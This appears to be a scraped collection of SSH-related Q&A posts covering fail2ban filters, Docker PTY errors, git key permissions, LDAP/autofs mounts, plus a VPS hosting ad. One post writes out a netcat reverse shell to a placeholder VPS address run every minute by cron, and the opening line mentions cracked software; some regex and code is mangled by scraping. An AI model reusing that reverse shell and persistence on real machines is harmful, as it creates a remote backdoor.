Modern SSH client (windows, mac and mobile)

check out ->
It is free but you have to pay to unlock more features, I couldn’t find crack for windows but there is crack for mac and android.

ssh – fail2ban not working with SSHD

I am running fail2ban (0.9.6-2) on Debian 9 with busybox-syslogd logging to /var/log/auth.log
setup with the following line in /etc/rc.local to get logs written to file.

/sbin/syslogd -O /var/log/auth.log || exit 1

SSHD jail is enabled but does not see failed login attempts

running fail2ban-regex on the auth.log file with the sshd filter gives no fails.

sshd_config set to AUTHPRIV and VERBOSE

Here is a sample of auth.log logs:

   Jan 14 17:12:41 Fire-Video sshd(2556): Failed none for video from port 56068 ssh2
Jan 14 17:12:42 Fire-Video sshd(2556): Failed password for video from port 56068 ssh2
Jan 14 17:12:42 Fire-Video sshd(2556): Failed password for video from port 56068 ssh2
Jan 14 17:12:42 Fire-Video sshd(2556): Connection closed by port 56068 (preauth)
Jan 14 17:12:49 Fire-Video sshd(2558): Connection from port 56074 on port 22
Jan 14 17:12:53 Fire-Video authpriv.debug sshd(2558): pam_usermapper(sshd:auth): pam_sm_authenticate flags: 00000001
Jan 14 17:12:53 Fire-Video authpriv.notice sshd(2558): pam_usermapper(sshd:auth): aliasing to 'root'
Jan 14 17:12:53 Fire-Video authpriv.notice sshd(2558): pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=  user=root
Jan 14 17:12:55 Fire-Video sshd(2558): Failed password for video from port 56074 ssh2
Jan 14 17:13:15 Fire-Video authpriv.debug sshd(2558): pam_usermapper(sshd:auth): pam_sm_authenticate flags: 00000001
Jan 14 17:13:16 Fire-Video sshd(2558): Failed password for video from port 56074 ssh2
Jan 14 17:13:21 Fire-Video authpriv.debug sshd(2558): pam_usermapper(sshd:auth): pam_sm_authenticate flags: 00000001
Jan 14 17:13:21 Fire-Video sshd(2558): Accepted password for video from port 56074 ssh2
Jan 14 17:13:21 Fire-Video sshd(2558): pam_unix(sshd:session): session opened for user root by (uid=0)

This is my sshd.conf in filter.d

      # PasswordAuthentication in sshd_config.
    # "Connection from <HOST> port d+" requires LogLevel VERBOSE in sshd_config
    # Read common prefixes. If any customizations available -- read them from
    # common.local
    before = common.conf
    _daemon = sshd
    failregex = ^%(__prefix_line)s(?:error: PAM: )?(aA)uthentication (?:failure|error|failed) for .* from <HOST>( via S+)?s*$
                ^%(__prefix_line)s(?:error: PAM: )?User not known to the underlying authentication module for .* from <HOST>s*$
                ^%(__prefix_line)sFailed S+ for (?P<cond_inv>invalid user )?(?P<user>(?P<cond_user>S+)|(?(cond_inv)(?:(?! from ).)*?|(^:)+)) from <HOST>(?: port d+)?(?: sshd*)?(?(cond_user):|(?:(?:(?! from ).)*)$)
                ^%(__prefix_line)sROOT LOGIN REFUSED.* FROM <HOST>s*$
                ^%(__prefix_line)s(iI)(?:llegal|nvalid) user .*? from <HOST>(?: port d+)?s*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because not listed in AllowUserss*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because listed in DenyUserss*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because not in any groups*$
                ^%(__prefix_line)srefused connect from S+ (<HOST>)s*$
                ^%(__prefix_line)s(?:error: )?Received disconnect from <HOST>: 3: .*: Auth fail(?: (preauth))?$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because a group is listed in DenyGroupss*$
                ^%(__prefix_line)sUser .+ from <HOST> not allowed because none of user's groups are listed in AllowGroupss*$
                ^(?P<__prefix>%(__prefix_line)s)User .+ not allowed because account is locked<SKIPLINES>(?P=__prefix)(?:error: )?Received disconnect from <HOST>: 11: .+ (preauth)$
                ^(?P<__prefix>%(__prefix_line)s)Disconnecting: Too many authentication failures for .+? (preauth)<SKIPLINES>(?P=__prefix)(?:error: )?Connection closed by <HOST> (preauth)$
                ^(?P<__prefix>%(__prefix_line)s)Connection from <HOST> port d+(?: on S+ port d+)?<SKIPLINES>(?P=__prefix)Disconnecting: Too many authentication failures for .+? (preauth)$
                ^%(__prefix_line)s(error: )?maximum authentication attempts exceeded for .* from <HOST>(?: port d*)?(?: sshd*)? (preauth)$
                ^%(__prefix_line)spam_unix(sshd:auth):s+authentication failure;s*logname=S*s*uid=d*s*euid=d*s*tty=S*s*ruser=S*s*rhost=<HOST>s.*$
    ignoreregex = 
    # "maxlines" is number of log lines to buffer for multi-line regex searches
    maxlines = 10
    journalmatch = _SYSTEMD_UNIT=sshd.service + _COMM=sshd

# DEV Notes:
#   "Failed S+ for .*? from <HOST>..." failregex uses non-greedy catch-all because
#   it is coming before use of <HOST> which is not hard-anchored at the end as well,
#   and later catch-all's could contain user-provided input, which need to be greedily
#   matched away first.
# Author: Cyril Jaquier, Yaroslav Halchenko, Petr Voralek, Daniel Black

docker – SSH fails to create a pseudo terminal

Our company’s product is an application running in a container. It listens on port 2222 to establish a Command Line Interface.

A customer is having issues with SSH, we have never seen this issue before, and cannot reproduce with the exact same OS (RHEL 7.8), Docker version (RHEL packaged 1.13.1) + Container (our app, same version).

When they do:

ssh -p 2222 <user>@<ip>

The errors they see client-side is:

server refused to allocate pty or PTY allocation request failed on channel 0

The error logs within our app (server) are:

openpty: Operation not permitted
session_pty_req: session 0 alloc failed
pam_unix(sshd:session): session closed for user <>

Googling this, a possibility is incorrect permissions on: /dev/pts, or /dev/pts/ptmx, or /dev/ptmx. But they are correct here.

Another possibility is that mount of devpts is missing gid=5. I checked and the mounts look correct both on the host and container.

# Host
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
# Container
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0

I’ve cross checked my system against the customer’s. It all looks to be matching, but obviously something is wrong.

Another data point: Currently they run the container using docker run --user 100001:0 ... where user-id=1000001, group-id=0 or root. If instead, they run the container as root docker run --user 0:0 ... then this issue does not occur. It’s a permissions issue somewhere.

Has anyone encountered this before?

Any hints would be much appreciated as I’m out of ideas.

ssh for git, users and permissions

I am setting up a git repository on my local network using ssh authentication. Trying to find some background to how it works.

I can ssh as ‘user’ from ‘my-workstation’ to ‘gitserver’ using pubkey authentication.

Copy ssh keys for ‘user’ from ‘my-workstation’ to the git users .ssh directory on ‘gitserver’:

root@gitserver/srv # ls -l

drwxrwx—. 7 git git 4.0K 06/01/21 08:35 git

root@gitserver/srv # ls -ld git/.ssh/

drwx——. 2 git git 28 Jan 3 12:12 git/.ssh/

root@gitserver/srv # ls -l git/.ssh/

-rw——-. 1 git git 1.8K 03/01/21 21:45 authorized_keys

How does this work when ssh thinks I am the ‘git’ user with commands like:

$git remote add origin git@gitserver:/srv/git/project.git

I don’t understand how ssh keys for ‘user’ can allow ssh authentication for user ‘git’.
Also all the permissions for the repository on ‘gitserver’ are for user ‘git’ not user ‘user’.

Trying to understand how this could possibly work ….

(it doesn’t !)


[]*OpenVZ VPS Hosting + Root / SSH Access + Free Setup + 99 % Uptime,$14.99 /M. | NewProxyLists is a perfect hosting company to get simple, fast, and secure hosting services, that allow you to take your business to the next level. We offer a wide range of web hosting services from shared hosting, reseller hosting, OpenVZ VPS & Dedicated Servers. We’re committed to providing the highest level of customer support across all of our offerings.

All our VPS hosting service includes control panel installation and setup, full root access, dedicated IP, free RDNS, and free re-installations. Just Sign up and be online within Hour with our instant & free setup!

We offer a 30-day money-back guarantee if you are not 100% satisfied with our service.

VPS Plans

Startup:$14.99 /Monthly

★ 1024 MB Memory
★ 30 GB Raid 10 Storage
★ 2 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup

Pro:$24.99 /Monthly

★ 2048 MB Memory
★ 60 GB Raid 10 Storage
★ 3 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup

Premium:$44.99 /Monthly

★ 4096 MB Memory
★ 120 GB Raid 10 Storage
★ 4 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup

Elite:$84.99 /Monthly

★ 8192 MB Memory
★ 180 GB Raid 10 Storage
★ 8 TB Monthly Traffic
★ 1 IPv4 included
★ Free Setup


For more Hosting plan details, please visit:

In case you have any questions, you can contact our sales department by initiating a chat or by dropping an email to

google cloud compute SSH service to keep running even the computer is turned off

I think the current workload is gonna to be hosed unless the program can be ran in the background while it’s still running.

Right now you are running in the foreground hence why the SSH session have to be on.

Though there may not be a way to “save it” you could in the future avail something like Tumux. Though like I said since it’s already been running and is I am not sure if you can attach a Tumux session to your active session for it to “switch to”.

ssh – Can’t connect to nc on VPS Please review

I’ve set up a connection on my own personal machine, using this code:


n=$(ps aux | grep -o (1)234)

if (( $n = “” )); then
mkfifo f
nc VPS_IP_ADDRESS_HERE 1234 < f | /bin/bash -i > f 2>&1

I want to connect to it from another different machine on a different network, so I bought a VPS! I replaced the text “VPS_IP_ADDRESS_HERE” with the IP address of my VPS. Then I made sure to give the script permissons with “chmod 777 /etc/whatever”. I also did a crontab to make sure the bash script runs every minute and set it to the following code:

Now on a different machine I SSH into the VPS and did the command “nc -l -p 1234” but no connections happened or anything! Please help!

Open and sync gnome-termial on ssh connect

I want to open gnome-terminal on host when there is incoming connection and close this when connection closes. For example doing it manually:

Contents of HOST ~/.bashrc

if (( -n $SSH_CONNECTION )) ; then

1. HOST: Connect to client

Open new gnome-terminal on host by script in ~/.bashrc

ssh user@host

2. CLIENT: Get the file name of the terminal connected


e.g. /dev/pts/1

3. HOST: Connect terminals

exec &> >(tee >(cat >&/dev/pts/1))

4. HOST: Close Connection

5. CLIENT: manually close the gnome terminal window

Is it possible to implement that behavior in CLIENT ~/.bashrc on every login even if there are multiple clients connected? So that CLIENT ssh user@host creates new gnome-terminal on HOST and syncs with that terminal and closes gnome-terminal when connection is terminated while keeping logs of all activity for connections?

Using LDAP: how to log in with SSH, mounting the Samba home directory with autofs?

I have spent some time setting up LDAP-based authentication in my MacOS, iOS and Linux network, taking account of the special quirks of MacOS and Synology (my NAS). SSH login (SSH keys etc.) works and Samba share mounts work. It was all quite fiddly, and I now know more about LDAP than I ever anticipated.


Having reached a point where I could (at least in theory) log into any machine in my network, I thought it would be nice for users to also have access to the same home directory everywhere. No problem: autofs, which can also be managed from LDAP! Or so I thought…

I’m trying something like the following to set up Samba home directories for autofs:

cn: &
objectClass: automount
objectClass: top
automountInformation: -fstype=cifs,vers=3.0,domain=HOME,rw,username=&,uid=&,gid=& ://s-sy-00.local/home

Some background:

  1. s-sy-00.local is my Synology NAS where the home directories will live.
  2. /home is UNC of the home directory share that Synology serves up for the user defined in username=.

The problems start when I log in to a remote machine with SSH. autofs tries to mount the user’s home directory, but needs the user’s password. I can put the password into a password= parameter in the automountInformation line, or I can put the username and the password into a credentials file that I pass with the credentials= parameter. Both approaches lead to added complexity (an automount entry for each user) and duplication (same username and password in two different places: LDAP and the credentials file or the automount and the posixUser in LDAP).

Is there a standard way of dealing with this problem? My search engine skills have not turned anything up yet.

It seems to me that there are three possible solutions:

  1. the one that is obvious to every one else but not to me;
  2. using the SSH key to mount a credentials file per user (possibly dynamically generated from LDAP) from an SSHFS share;
  3. using Kerberos for a full-blown SSO.

I would prefer number 1 🙂 I have an aversion to Kerberos: it seems to be overkill and is certainly relatively complex.

Can anyone offer some words of wisdom to give me a flying start into the new year?